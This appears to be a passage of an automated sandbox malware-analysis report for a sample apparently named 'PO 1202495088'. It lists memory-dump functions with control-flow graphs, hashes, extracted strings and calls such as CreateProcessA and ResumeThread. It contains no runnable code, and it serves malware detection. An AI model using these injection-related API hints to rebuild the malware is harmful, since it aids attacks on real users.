                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tegq$Tegq$z^I
                                                                                          • API String ID: 0-723423495
                                                                                          • Opcode ID: 5a43bb44397ec66e72061ae604f8289b4ebada149beaf06b1f16d1a0a166327a
                                                                                          • Instruction ID: 03d19f02431e1eb1980364e04196b84fbeb7ef4531d566faab0159eca49b6451
                                                                                          • Opcode Fuzzy Hash: 5a43bb44397ec66e72061ae604f8289b4ebada149beaf06b1f16d1a0a166327a
                                                                                          • Instruction Fuzzy Hash: D891B2B4E012198FDB08CFAAC98469EFBB2FF88300F24956AD415BB368D7349945CF54
                                                                                          Function 030E5E80 Relevance: 2.9, Strings: 2, Instructions: 396COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 93 30e5e80-30e5f62 94 30e5f69-30e5f8d 93->94 95 30e5f64 93->95 96 30e5f8f 94->96 97 30e5f94-30e5fd2 call 30e6511 94->97 95->94 96->97 99 30e5fd8 97->99 100 30e5fdf-30e5ffb 99->100 101 30e5ffd 100->101 102 30e6004-30e6005 100->102 101->99 101->102 103 30e622d-30e6231 101->103 104 30e60ed-30e610b 101->104 105 30e600a-30e600e 101->105 106 30e604b-30e6054 101->106 107 30e62eb-30e6310 101->107 108 30e61e3-30e61f8 101->108 109 30e6080-30e6098 101->109 110 30e615f-30e6171 101->110 111 30e633f-30e6356 101->111 112 30e61fd-30e6201 101->112 113 30e625d-30e6269 101->113 114 30e613a-30e615a 101->114 115 30e635b-30e6362 101->115 116 30e619b-30e61b2 101->116 117 30e6176-30e6196 101->117 118 30e60d6-30e60e8 101->118 119 30e61b7-30e61cc 101->119 120 30e6037-30e6049 101->120 121 30e6315-30e6321 101->121 122 30e6110-30e611c 101->122 123 30e61d1-30e61de 101->123 102->115 124 30e6244-30e624b 103->124 125 30e6233-30e6242 103->125 104->100 130 30e6010-30e601f 105->130 131 30e6021-30e6028 105->131 132 30e6056-30e6065 106->132 133 30e6067-30e606e 106->133 107->100 108->100 134 30e609f-30e60b5 109->134 135 30e609a 109->135 110->100 111->100 136 30e6214-30e621b 112->136 137 30e6203-30e6212 112->137 126 30e626b 113->126 127 30e6270-30e6286 113->127 114->100 116->100 117->100 118->100 119->100 120->100 138 30e6328-30e633a 121->138 139 30e6323 121->139 128 30e611e 122->128 129 30e6123-30e6135 122->129 123->100 141 30e6252-30e6258 124->141 125->141 126->127 154 30e628d-30e62a3 127->154 155 30e6288 127->155 128->129 129->100 144 30e602f-30e6035 130->144 131->144 146 30e6075-30e607b 132->146 133->146 152 30e60bc-30e60d1 134->152 153 30e60b7 134->153 135->134 140 30e6222-30e6228 136->140 137->140 138->100 139->138 140->100 141->100 144->100 146->100 152->100 153->152 158 30e62aa-30e62c0 154->158 159 30e62a5 154->159 155->154 161 30e62c7-30e62e6 158->161 162 30e62c2 158->162 159->158 161->100 162->161
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 86f0b38c86be283e660a629651aecc346e0238d06c31cfa80cd052f1518f3263
                                                                                          • Instruction ID: a38f710a64702de8c7844b3e550ec3e8125510b6fad5623dc2cb94508f10a59b
                                                                                          • Opcode Fuzzy Hash: 86f0b38c86be283e660a629651aecc346e0238d06c31cfa80cd052f1518f3263
                                                                                          • Instruction Fuzzy Hash: A9F18C71E02209EFCB14EF95DD828AEFBB2FF89344B248559E401A7215D335EA52CF91
                                                                                          Function 030E5E50 Relevance: 2.9, Strings: 2, Instructions: 379COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 165 30e5e50-30e5e56 166 30e5ea8-30e5f62 165->166 167 30e5e58-30e5e5a 165->167 168 30e5f69-30e5f8d 166->168 169 30e5f64 166->169 167->166 170 30e5f8f 168->170 171 30e5f94-30e5fd2 call 30e6511 168->171 169->168 170->171 173 30e5fd8 171->173 174 30e5fdf-30e5ffb 173->174 175 30e5ffd 174->175 176 30e6004-30e6005 174->176 175->173 175->176 177 30e622d-30e6231 175->177 178 30e60ed-30e610b 175->178 179 30e600a-30e600e 175->179 180 30e604b-30e6054 175->180 181 30e62eb-30e6310 175->181 182 30e61e3-30e61f8 175->182 183 30e6080-30e6098 175->183 184 30e615f-30e6171 175->184 185 30e633f-30e6356 175->185 186 30e61fd-30e6201 175->186 187 30e625d-30e6269 175->187 188 30e613a-30e615a 175->188 189 30e635b-30e6362 175->189 190 30e619b-30e61b2 175->190 191 30e6176-30e6196 175->191 192 30e60d6-30e60e8 175->192 193 30e61b7-30e61cc 175->193 194 30e6037-30e6049 175->194 195 30e6315-30e6321 175->195 196 30e6110-30e611c 175->196 197 30e61d1-30e61de 175->197 176->189 198 30e6244-30e624b 177->198 199 30e6233-30e6242 177->199 178->174 204 30e6010-30e601f 179->204 205 30e6021-30e6028 179->205 206 30e6056-30e6065 180->206 207 30e6067-30e606e 180->207 181->174 182->174 208 30e609f-30e60b5 183->208 209 30e609a 183->209 184->174 185->174 210 30e6214-30e621b 186->210 211 30e6203-30e6212 186->211 200 30e626b 187->200 201 30e6270-30e6286 187->201 188->174 190->174 191->174 192->174 193->174 194->174 212 30e6328-30e633a 195->212 213 30e6323 195->213 202 30e611e 196->202 203 30e6123-30e6135 196->203 197->174 215 30e6252-30e6258 198->215 199->215 200->201 228 30e628d-30e62a3 201->228 229 30e6288 201->229 202->203 203->174 218 30e602f-30e6035 204->218 205->218 220 30e6075-30e607b 206->220 207->220 226 30e60bc-30e60d1 208->226 227 30e60b7 208->227 209->208 214 30e6222-30e6228 210->214 211->214 212->174 213->212 214->174 215->174 218->174 220->174 226->174 227->226 232 30e62aa-30e62c0 228->232 233 30e62a5 228->233 229->228 235 30e62c7-30e62e6 232->235 236 30e62c2 232->236 233->232 235->174 236->235
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 46fa76db3be985684abda971f551585544c7394fee34e23d7237a0432f761129
                                                                                          • Instruction ID: 4ad78d59615baa0cb4a8f35558a01d699b01212e041bb0e6ac9ed31a8aee525c
                                                                                          • Opcode Fuzzy Hash: 46fa76db3be985684abda971f551585544c7394fee34e23d7237a0432f761129
                                                                                          • Instruction Fuzzy Hash: C1E19C71E02219EFCB14DF95D8818AEFBB2FF89304B248959E406A7315D335EA52CF91
                                                                                          Function 030E5F68 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 239 30e5f68-30e5f8d 241 30e5f8f 239->241 242 30e5f94-30e5fd2 call 30e6511 239->242 241->242 244 30e5fd8 242->244 245 30e5fdf-30e5ffb 244->245 246 30e5ffd 245->246 247 30e6004-30e6005 245->247 246->244 246->247 248 30e622d-30e6231 246->248 249 30e60ed-30e610b 246->249 250 30e600a-30e600e 246->250 251 30e604b-30e6054 246->251 252 30e62eb-30e6310 246->252 253 30e61e3-30e61f8 246->253 254 30e6080-30e6098 246->254 255 30e615f-30e6171 246->255 256 30e633f-30e6356 246->256 257 30e61fd-30e6201 246->257 258 30e625d-30e6269 246->258 259 30e613a-30e615a 246->259 260 30e635b-30e6362 246->260 261 30e619b-30e61b2 246->261 262 30e6176-30e6196 246->262 263 30e60d6-30e60e8 246->263 264 30e61b7-30e61cc 246->264 265 30e6037-30e6049 246->265 266 30e6315-30e6321 246->266 267 30e6110-30e611c 246->267 268 30e61d1-30e61de 246->268 247->260 269 30e6244-30e624b 248->269 270 30e6233-30e6242 248->270 249->245 275 30e6010-30e601f 250->275 276 30e6021-30e6028 250->276 277 30e6056-30e6065 251->277 278 30e6067-30e606e 251->278 252->245 253->245 279 30e609f-30e60b5 254->279 280 30e609a 254->280 255->245 256->245 281 30e6214-30e621b 257->281 282 30e6203-30e6212 257->282 271 30e626b 258->271 272 30e6270-30e6286 258->272 259->245 261->245 262->245 263->245 264->245 265->245 283 30e6328-30e633a 266->283 284 30e6323 266->284 273 30e611e 267->273 274 30e6123-30e6135 267->274 268->245 286 30e6252-30e6258 269->286 270->286 271->272 299 30e628d-30e62a3 272->299 300 30e6288 272->300 273->274 274->245 289 30e602f-30e6035 275->289 276->289 291 30e6075-30e607b 277->291 278->291 297 30e60bc-30e60d1 279->297 298 30e60b7 279->298 280->279 285 30e6222-30e6228 281->285 282->285 283->245 284->283 285->245 286->245 289->245 291->245 297->245 298->297 303 30e62aa-30e62c0 299->303 304 30e62a5 299->304 300->299 306 30e62c7-30e62e6 303->306 307 30e62c2 303->307 304->303 306->245 307->306
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 5f19e97dedc851416a887b8089433fba6e460c014ed4a8082ee2c4ccb08b502c
                                                                                          • Instruction ID: ef5c15fe75ea410004ade74762d1d8858f9f9b9863b43989e245bed2921a3a69
                                                                                          • Opcode Fuzzy Hash: 5f19e97dedc851416a887b8089433fba6e460c014ed4a8082ee2c4ccb08b502c
                                                                                          • Instruction Fuzzy Hash: 05C16C70E0621ADFCB14CFA9D4858AEFBB2FF89304B24C959D416A7214D734EA42CF94
                                                                                          Function 030ECC5B Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 310 30ecc5b-30ecc62 311 30ecc69-30ecc8d 310->311 312 30ecc64 310->312 313 30ecc8f 311->313 314 30ecc94-30eccc5 311->314 312->311 313->314 315 30eccc6 314->315 316 30ecccd-30ecce9 315->316 317 30ecceb 316->317 318 30eccf2-30eccf3 316->318 317->315 317->318 319 30ece4b-30ece60 317->319 320 30ecdc8-30ecddf 317->320 321 30ecf29-30ecf40 317->321 322 30ecde4-30ecdf7 317->322 323 30ece65-30ece6e 317->323 324 30ecf45-30ecf5a 317->324 325 30ecd80-30ecd92 317->325 326 30ecede-30ecef6 317->326 327 30ecf5f-30ecf68 317->327 328 30ece9f-30eceb2 317->328 329 30ecdfc-30ece00 317->329 330 30ecd3c-30ecd4f 317->330 331 30ecefb-30ecf0d 317->331 332 30eccf8-30ecd3a 317->332 333 30ecd97-30ecd9a 317->333 334 30ecd54 317->334 335 30ecf12-30ecf24 317->335 336 30ece73 317->336 337 30ece33-30ece46 317->337 318->327 319->316 320->316 321->316 322->316 323->316 324->316 325->316 326->316 340 30eceb4-30ecec3 328->340 341 30ecec5-30ececc 328->341 338 30ece02-30ece11 329->338 339 30ece13-30ece1a 329->339 330->316 331->316 332->316 347 30ecda3-30ecdc3 333->347 344 30ecd5d-30ecd7b 334->344 335->316 345 30ece7c-30ece9a 336->345 337->316 342 30ece21-30ece2e 338->342 339->342 346 30eced3-30eced9 340->346 341->346 342->316 344->316 345->316 346->316 347->316
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TuA$UC;"
                                                                                          • API String ID: 0-2071649361
                                                                                          • Opcode ID: 176b0c9d44d7c797351dafca1ab97102ed1ccd2f93b217b693c896b787f9c635
                                                                                          • Instruction ID: 463a76c698e9d6ab2f043e45931f43db2885640b88b82f86f6af6ddd0654ccf1
                                                                                          • Opcode Fuzzy Hash: 176b0c9d44d7c797351dafca1ab97102ed1ccd2f93b217b693c896b787f9c635
                                                                                          • Instruction Fuzzy Hash: 95910571E05619EFDB08CFA6E4809DEFBB2EF89310F14982AE419BB264D7319542CF40
                                                                                          Function 030EB5BE Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5=6
                                                                                          • API String ID: 0-2897083178
                                                                                          • Opcode ID: 96d5beee539515e0048daed932c2b8eea0118e8f641518648ab96928ecb175c1
                                                                                          • Instruction ID: ceb07d89c47f42530e12d96d7d9855292f606adba047308b0f0d50cddf25d6e4
                                                                                          • Opcode Fuzzy Hash: 96d5beee539515e0048daed932c2b8eea0118e8f641518648ab96928ecb175c1
                                                                                          • Instruction Fuzzy Hash: 83816E74E0A24A9FCB08CFA5D8404AEFFF2FF4A200F1498AAD055E7265D7789A05CF51
                                                                                          Function 030EB630 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5=6
                                                                                          • API String ID: 0-2897083178
                                                                                          • Opcode ID: e0f40c52701d36b749120c1b3fae8f532ecf9d9683a178a16dcf0e97035dbda5
                                                                                          • Instruction ID: 6bc9fdaee214f507822ce96f487ef5150d32538fface32020810d5ccc437ebfe
                                                                                          • Opcode Fuzzy Hash: e0f40c52701d36b749120c1b3fae8f532ecf9d9683a178a16dcf0e97035dbda5
                                                                                          • Instruction Fuzzy Hash: CB711874E0A21A9FCF48CFA5D9444AEFBF2FF89201F10992AD016E7258D7789A01CF54
                                                                                          Function 030EBC38 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: iUfo
                                                                                          • API String ID: 0-3820436262
                                                                                          • Opcode ID: 2c9b94e9b3f9bed4271eab5a88a872006ad59757f388f6bb614d619047dc267d
                                                                                          • Instruction ID: acea1b07e2017edf8aa10ed8cc2931d20eea606dacd3a1d478a1455c4589aa2a
                                                                                          • Opcode Fuzzy Hash: 2c9b94e9b3f9bed4271eab5a88a872006ad59757f388f6bb614d619047dc267d
                                                                                          • Instruction Fuzzy Hash: B751D2B4E092199FDB18CFA9D9855AEFBF2BB88300F10942AE405B7354EB345A41CF54
                                                                                          Function 030EBC28 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: iUfo
                                                                                          • API String ID: 0-3820436262
                                                                                          • Opcode ID: e1682b0c63073aaa0d7b6065d993e2aca54f2bfd772794f526694f2ba11aad5d
                                                                                          • Instruction ID: b3c25e00084d49fd6d5619f1f6121f339ddea505341575ebc127fdea09775cab
                                                                                          • Opcode Fuzzy Hash: e1682b0c63073aaa0d7b6065d993e2aca54f2bfd772794f526694f2ba11aad5d
                                                                                          • Instruction Fuzzy Hash: 185106B4E096198FCF58CFE9D5855ADFBF2BB88300F10982AE415A7214EB349A018F54
                                                                                          Function 030E46B0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -2m
                                                                                          • API String ID: 0-2686427999
                                                                                          • Opcode ID: e46902df902185160cc83ccdcad26ed068547dafab563d2cba049207dccf18e0
                                                                                          • Instruction ID: a8b63f494281f2b0d8e2843eba1e6e1e89f28f66106d8fc531980522409b01d3
                                                                                          • Opcode Fuzzy Hash: e46902df902185160cc83ccdcad26ed068547dafab563d2cba049207dccf18e0
                                                                                          • Instruction Fuzzy Hash: 625149B4E052198FDB08CFAAC5445AEFBF2FF89301F28D06AD449A7254D7344A41CFA4
                                                                                          Function 030E11F8 Relevance: .8, Instructions: 848COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72fbf6a62245c79be9a3766e261f47f004232df0807ba03248a0c24246d8e5dc
                                                                                          • Instruction ID: dee595d12974a69ac0c510a80629a72ba15eadbc3d979daa682eafccddf3e03a
                                                                                          • Opcode Fuzzy Hash: 72fbf6a62245c79be9a3766e261f47f004232df0807ba03248a0c24246d8e5dc
                                                                                          • Instruction Fuzzy Hash: A892D234A01619CFDB24DB64C894BD9B7B1FF8A300F1186EAD4496B360DB71AE85CF51
                                                                                          Function 030E04E8 Relevance: .8, Instructions: 843COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9afaf9c8191bf3db5b422c38b1847c230720e51b5dce9a0b43289abfb7f91e3e
                                                                                          • Instruction ID: 2ac40c3d408482bf3e57f2bfc6de4f18913d2ad87be24b15a319c68db6862ef4
                                                                                          • Opcode Fuzzy Hash: 9afaf9c8191bf3db5b422c38b1847c230720e51b5dce9a0b43289abfb7f91e3e
                                                                                          • Instruction Fuzzy Hash: 3392C134A01619CFDB24DB64C894BD9B7B1FF8A300F1186EAE4496B360DB71AE85CF51
                                                                                          Function 030EDF08 Relevance: .1, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4668abd2c329a06be1eba29dd3d21b4a71d6a7202873872d74b15e3a1f9c44d4
                                                                                          • Instruction ID: aaed0ef373e3fdadb871afa9dfaeb4b647a782b7cf52669b3293feebff6cdd51
                                                                                          • Opcode Fuzzy Hash: 4668abd2c329a06be1eba29dd3d21b4a71d6a7202873872d74b15e3a1f9c44d4
                                                                                          • Instruction Fuzzy Hash: 59413A74E06209DFDB48DFA9C9546AEBBF2FB89300F24C4AAD415AB354E7349A41CF44
                                                                                          Function 030E50E8 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c60c288416131833c83c337806a658e62f2b3fba11e02ad8410a9f8ff91c892d
                                                                                          • Instruction ID: cd6aa289415a1c6fa6ccf600f2343b8fe8d0fcd6515a9f575a88cbca48fef9d4
                                                                                          • Opcode Fuzzy Hash: c60c288416131833c83c337806a658e62f2b3fba11e02ad8410a9f8ff91c892d
                                                                                          • Instruction Fuzzy Hash: 26315C71E056488FDB18CFAACC402DDBFB2AF8A304F18C0AAD408AB265D7355945CF51
                                                                                          Function 075F96CC Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccb4fde2939f89edc4b118ba7ebb49f300fc8ff5cdd9b36f29c246426d310492
                                                                                          • Instruction ID: 1fa3849d229d928d604d8f880a58a19441c35cd7e48d7cfe99454f881dc897e8
                                                                                          • Opcode Fuzzy Hash: ccb4fde2939f89edc4b118ba7ebb49f300fc8ff5cdd9b36f29c246426d310492
                                                                                          • Instruction Fuzzy Hash: 2D11F874908228CFCB60DF54E8847E8BBB8BB4A325F105496D50DE3211DB359AC9CF41
                                                                                          Function 075F6EDD Relevance: 1.9, APIs: 1, Instructions: 395threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 349 75f6edd-75f71f4 ResumeThread 353 75f71fd-75f723f 349->353 354 75f71f6-75f71fc 349->354 354->353
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 075F71DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 9629e5c721e9c1dbc2f91f3d79e9ce4fb77c7d9f73c56e1b92455885ae16fff5
                                                                                          • Instruction ID: acc644266523d17b53af082fc52c86e2a9df6494a194987a0703e4e15350743e
                                                                                          • Opcode Fuzzy Hash: 9629e5c721e9c1dbc2f91f3d79e9ce4fb77c7d9f73c56e1b92455885ae16fff5
                                                                                          • Instruction Fuzzy Hash: 4E31BBB4D002589FCB10CFAAE881AEEFBB4FB49310F14945AE814B7240C735A945CFA4
                                                                                          Function 075F7C76 Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 359 75f7c76-75f7d11 362 75f7d5a-75f7d82 359->362 363 75f7d13-75f7d2a 359->363 366 75f7dc8-75f7e1e 362->366 367 75f7d84-75f7d98 362->367 363->362 368 75f7d2c-75f7d31 363->368 377 75f7e64-75f7f5b CreateProcessA 366->377 378 75f7e20-75f7e34 366->378 367->366 375 75f7d9a-75f7d9f 367->375 369 75f7d54-75f7d57 368->369 370 75f7d33-75f7d3d 368->370 369->362 372 75f7d3f 370->372 373 75f7d41-75f7d50 370->373 372->373 373->373 376 75f7d52 373->376 379 75f7dc2-75f7dc5 375->379 380 75f7da1-75f7dab 375->380 376->369 396 75f7f5d-75f7f63 377->396 397 75f7f64-75f8049 377->397 378->377 385 75f7e36-75f7e3b 378->385 379->366 381 75f7daf-75f7dbe 380->381 382 75f7dad 380->382 381->381 386 75f7dc0 381->386 382->381 387 75f7e5e-75f7e61 385->387 388 75f7e3d-75f7e47 385->388 386->379 387->377 390 75f7e4b-75f7e5a 388->390 391 75f7e49 388->391 390->390 392 75f7e5c 390->392 391->390 392->387 396->397 409 75f804b-75f804f 397->409 410 75f8059-75f805d 397->410 409->410 413 75f8051 409->413 411 75f805f-75f8063 410->411 412 75f806d-75f8071 410->412 411->412 414 75f8065 411->414 415 75f8073-75f8077 412->415 416 75f8081-75f8085 412->416 413->410 414->412 415->416 417 75f8079 415->417 418 75f80bb-75f80c6 416->418 419 75f8087-75f80b0 416->419 417->416 423 75f80c7 418->423 419->418 423->423
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075F7F3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 063708012235ae321e07ce8e7bbb349615915cbc3aa6c1d43919921f4bb61ab9
                                                                                          • Instruction ID: 4b988f64bade065baaa3211ff2657763fcad3cf0791ace22d43af429117408ee
                                                                                          • Opcode Fuzzy Hash: 063708012235ae321e07ce8e7bbb349615915cbc3aa6c1d43919921f4bb61ab9
                                                                                          • Instruction Fuzzy Hash: B7C116B1D0021E8FDB20CFA8C841BEDBBB1BF49300F4495AAD919B7250DB749A85CF95
                                                                                          Function 075F7C78 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 424 75f7c78-75f7d11 426 75f7d5a-75f7d82 424->426 427 75f7d13-75f7d2a 424->427 430 75f7dc8-75f7e1e 426->430 431 75f7d84-75f7d98 426->431 427->426 432 75f7d2c-75f7d31 427->432 441 75f7e64-75f7f5b CreateProcessA 430->441 442 75f7e20-75f7e34 430->442 431->430 439 75f7d9a-75f7d9f 431->439 433 75f7d54-75f7d57 432->433 434 75f7d33-75f7d3d 432->434 433->426 436 75f7d3f 434->436 437 75f7d41-75f7d50 434->437 436->437 437->437 440 75f7d52 437->440 443 75f7dc2-75f7dc5 439->443 444 75f7da1-75f7dab 439->444 440->433 460 75f7f5d-75f7f63 441->460 461 75f7f64-75f8049 441->461 442->441 449 75f7e36-75f7e3b 442->449 443->430 445 75f7daf-75f7dbe 444->445 446 75f7dad 444->446 445->445 450 75f7dc0 445->450 446->445 451 75f7e5e-75f7e61 449->451 452 75f7e3d-75f7e47 449->452 450->443 451->441 454 75f7e4b-75f7e5a 452->454 455 75f7e49 452->455 454->454 456 75f7e5c 454->456 455->454 456->451 460->461 473 75f804b-75f804f 461->473 474 75f8059-75f805d 461->474 473->474 477 75f8051 473->477 475 75f805f-75f8063 474->475 476 75f806d-75f8071 474->476 475->476 478 75f8065 475->478 479 75f8073-75f8077 476->479 480 75f8081-75f8085 476->480 477->474 478->476 479->480 481 75f8079 479->481 482 75f80bb-75f80c6 480->482 483 75f8087-75f80b0 480->483 481->480 487 75f80c7 482->487 483->482 487->487
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075F7F3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 15bd95f1f0965f16f3f746055c0b165366a1e27cac7820921ff19d65b63eadda
                                                                                          • Instruction ID: 2998848e58c59918ff52d21aa2391ecf27716e424b70c2276b30e9426fbe288e
